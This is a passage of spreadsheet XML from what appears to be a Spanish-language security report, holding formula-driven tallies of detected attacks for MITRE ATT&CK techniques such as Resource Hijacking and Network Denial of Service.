      </c>
      <c r="AH47" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>5</v>
      </c>
      <c r="AI47" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ47" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>1</v>
      </c>
      <c r="AK47" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>25</v>
      </c>
      <c r="AL47" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>10</v>
      </c>
      <c r="AM47" s="322" t="str">
        <f t="shared" si="5"/>
        <v>10 (25)</v>
      </c>
      <c r="AN47" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>8</v>
      </c>
      <c r="AO47" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP47" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>4</v>
      </c>
      <c r="AQ47" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR47" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS47" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT47" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU47" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV47" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW47" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>12</v>
      </c>
      <c r="AX47" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>3</v>
      </c>
      <c r="AY47" s="322" t="str">
        <f t="shared" si="7"/>
        <v>3 (12)</v>
      </c>
      <c r="AZ47" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>1</v>
      </c>
      <c r="BA47" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB47" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>3</v>
      </c>
      <c r="BC47" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>19</v>
      </c>
      <c r="BD47" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>6</v>
      </c>
      <c r="BE47" s="4" t="str">
        <f t="shared" si="8"/>
        <v>6 (19)</v>
      </c>
      <c r="BF47" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>4</v>
      </c>
      <c r="BG47" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH47" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>4</v>
      </c>
      <c r="BI47" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>3</v>
      </c>
      <c r="BJ47" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>2</v>
      </c>
      <c r="BK47" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL47" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>2</v>
      </c>
      <c r="BM47" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN47" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>1</v>
      </c>
      <c r="BO47" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>10</v>
      </c>
      <c r="BP47" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>9</v>
      </c>
      <c r="BQ47" s="4" t="str">
        <f t="shared" si="10"/>
        <v>9 (10)</v>
      </c>
      <c r="BR47" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>2</v>
      </c>
      <c r="BS47" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>4</v>
      </c>
      <c r="BT47" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU47" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>8</v>
      </c>
      <c r="BV47" s="292">
        <v>0</v>
      </c>
      <c r="BW47" s="322">
        <v>0</v>
      </c>
      <c r="BX47" s="4" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY47" s="12">
        <v>0</v>
      </c>
      <c r="BZ47" s="13">
        <v>0</v>
      </c>
      <c r="CA47" s="394">
        <v>0</v>
      </c>
      <c r="CB47" s="288">
        <v>0</v>
      </c>
      <c r="CC47" s="4">
        <v>0</v>
      </c>
      <c r="CD47" s="4" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE47" s="4">
        <v>0</v>
      </c>
      <c r="CF47" s="4">
        <v>0</v>
      </c>
      <c r="CG47" s="13">
        <v>0</v>
      </c>
      <c r="CH47" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="48" spans="1:86" ht="15" customHeight="1">
      <c r="A48" s="4">
        <f t="shared" si="13"/>
        <v>46</v>
      </c>
      <c r="B48" s="4" t="str">
        <f>IFERROR(VLOOKUP(A48,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1496</v>
      </c>
      <c r="C48" s="493" t="str">
        <f>IFERROR(VLOOKUP(B48,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Resource Hijacking</v>
      </c>
      <c r="D48" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B48)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E48" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F48" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (12)</v>
      </c>
      <c r="G48" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>6</v>
      </c>
      <c r="H48" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>6</v>
      </c>
      <c r="I48" s="322" t="str">
        <f t="shared" si="0"/>
        <v>6 (6)</v>
      </c>
      <c r="J48" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>3</v>
      </c>
      <c r="K48" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L48" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>2</v>
      </c>
      <c r="M48" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N48" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O48" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P48" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q48" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R48" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S48" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>6</v>
      </c>
      <c r="T48" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>6</v>
      </c>
      <c r="U48" s="4" t="str">
        <f t="shared" si="2"/>
        <v>6 (6)</v>
      </c>
      <c r="V48" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>3</v>
      </c>
      <c r="W48" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X48" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>2</v>
      </c>
      <c r="Y48" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>8</v>
      </c>
      <c r="Z48" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>8</v>
      </c>
      <c r="AA48" s="322" t="str">
        <f t="shared" si="3"/>
        <v>8 (8)</v>
      </c>
      <c r="AB48" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>3</v>
      </c>
      <c r="AC48" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD48" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>4</v>
      </c>
      <c r="AE48" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>6</v>
      </c>
      <c r="AF48" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>4</v>
      </c>
      <c r="AG48" s="322" t="str">
        <f t="shared" si="4"/>
        <v>4 (6)</v>
      </c>
      <c r="AH48" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>2</v>
      </c>
      <c r="AI48" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ48" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>3</v>
      </c>
      <c r="AK48" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>14</v>
      </c>
      <c r="AL48" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>12</v>
      </c>
      <c r="AM48" s="322" t="str">
        <f t="shared" si="5"/>
        <v>12 (14)</v>
      </c>
      <c r="AN48" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>6</v>
      </c>
      <c r="AO48" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP48" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>4</v>
      </c>
      <c r="AQ48" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR48" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS48" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT48" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU48" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV48" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW48" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>2</v>
      </c>
      <c r="AX48" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>2</v>
      </c>
      <c r="AY48" s="322" t="str">
        <f t="shared" si="7"/>
        <v>2 (2)</v>
      </c>
      <c r="AZ48" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>1</v>
      </c>
      <c r="BA48" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB48" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>2</v>
      </c>
      <c r="BC48" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>8</v>
      </c>
      <c r="BD48" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>8</v>
      </c>
      <c r="BE48" s="4" t="str">
        <f t="shared" si="8"/>
        <v>8 (8)</v>
      </c>
      <c r="BF48" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>4</v>
      </c>
      <c r="BG48" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH48" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>4</v>
      </c>
      <c r="BI48" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ48" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK48" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL48" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM48" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN48" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO48" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>13</v>
      </c>
      <c r="BP48" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>10</v>
      </c>
      <c r="BQ48" s="4" t="str">
        <f t="shared" si="10"/>
        <v>10 (13)</v>
      </c>
      <c r="BR48" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS48" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>5</v>
      </c>
      <c r="BT48" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU48" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B48,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>10</v>
      </c>
      <c r="BV48" s="292">
        <v>4</v>
      </c>
      <c r="BW48" s="322">
        <v>4</v>
      </c>
      <c r="BX48" s="4" t="str">
        <f t="shared" si="11"/>
        <v>4 (4)</v>
      </c>
      <c r="BY48" s="12">
        <v>2</v>
      </c>
      <c r="BZ48" s="13">
        <v>1</v>
      </c>
      <c r="CA48" s="394">
        <v>4</v>
      </c>
      <c r="CB48" s="288">
        <v>8</v>
      </c>
      <c r="CC48" s="4">
        <v>8</v>
      </c>
      <c r="CD48" s="4" t="str">
        <f t="shared" si="12"/>
        <v>8 (8)</v>
      </c>
      <c r="CE48" s="4">
        <v>2</v>
      </c>
      <c r="CF48" s="4">
        <v>3</v>
      </c>
      <c r="CG48" s="13">
        <v>1</v>
      </c>
      <c r="CH48" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="49" spans="1:86" ht="15" customHeight="1">
      <c r="A49" s="4">
        <f t="shared" si="13"/>
        <v>47</v>
      </c>
      <c r="B49" s="4" t="str">
        <f>IFERROR(VLOOKUP(A49,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1498</v>
      </c>
      <c r="C49" s="493" t="str">
        <f>IFERROR(VLOOKUP(B49,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Network Denial of Service</v>
      </c>
      <c r="D49" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B49)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>8</v>
      </c>
      <c r="E49" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1432072</v>
      </c>
      <c r="F49" s="579" t="str">
        <f t="shared" si="14"/>
        <v>8 (1432072)</v>
      </c>
      <c r="G49" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>272</v>
      </c>
      <c r="H49" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>251</v>
      </c>
      <c r="I49" s="322" t="str">
        <f t="shared" si="0"/>
        <v>251 (272)</v>
      </c>
      <c r="J49" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>3</v>
      </c>
      <c r="K49" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0.375</v>
      </c>
      <c r="L49" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>251</v>
      </c>
      <c r="M49" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>603</v>
      </c>
      <c r="N49" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>603</v>
      </c>
      <c r="O49" s="322" t="str">
        <f t="shared" si="1"/>
        <v>603 (603)</v>
      </c>
      <c r="P49" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>2</v>
      </c>
      <c r="Q49" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0.25</v>
      </c>
      <c r="R49" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>603</v>
      </c>
      <c r="S49" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>875</v>
      </c>
      <c r="T49" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>854</v>
      </c>
      <c r="U49" s="4" t="str">
        <f t="shared" si="2"/>
        <v>854 (875)</v>
      </c>
      <c r="V49" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="W49" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>0.375</v>
      </c>
      <c r="X49" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>854</v>
      </c>
      <c r="Y49" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>376333</v>
      </c>
      <c r="Z49" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>310064</v>
      </c>
      <c r="AA49" s="322" t="str">
        <f t="shared" si="3"/>
        <v>310064 (376333)</v>
      </c>
      <c r="AB49" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="AC49" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B49,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
